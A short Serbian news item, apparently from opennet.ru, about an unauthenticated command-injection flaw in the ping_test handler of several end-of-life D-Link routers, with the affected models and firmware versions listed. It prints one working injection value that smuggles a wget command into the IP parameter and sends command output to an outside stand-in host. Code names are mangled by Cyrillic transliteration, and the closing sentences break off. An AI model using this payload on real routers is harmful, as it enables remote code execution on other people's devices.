У Д-Линк бежичним рутерима
Занимљиво је да према програмерима фирмвера, позив „пинг_тест“ треба да се изврши тек након аутентификације, али у стварности се позива у сваком случају, без обзира на пријављивање на веб интерфејс. Конкретно, када се приступи скрипти аппли_сец.цги и проследи параметар „ацтион=пинг_тест“, скрипта преусмерава на страницу за потврду идентитета, али у исто време обавља акцију повезану са пинг_тестом. За извршење кода коришћена је још једна рањивост у самом пинг_тест, који позива услужни програм за пинг без прописне провере исправности ИП адресе послате на тестирање. На пример, да бисте позвали услужни програм вгет и пренели резултате команде „ецхо 1234“ на спољни хост, само наведите параметар „пинг_ипаддр=127.0.0.1%0авгет%20-П%20/тмп/%20хттп:// тест.тест/?$( ецхо 1234)".
Присуство рањивости је званично потврђено у следећим моделима:
- ДИР-655 са фирмвером 3.02б05 или старијим;
- ДИР-866Л са фирмвером 1.03б04 или старијим;
- ДИР-1565 са фирмвером 1.01 или старијим;
- ДИР-652 (нема информација о проблематичним верзијама фирмвера)
Период подршке за ове моделе је већ истекао, па је Д-Линк
Касније је откривено да је рањивост такође
Извор: опеннет.ру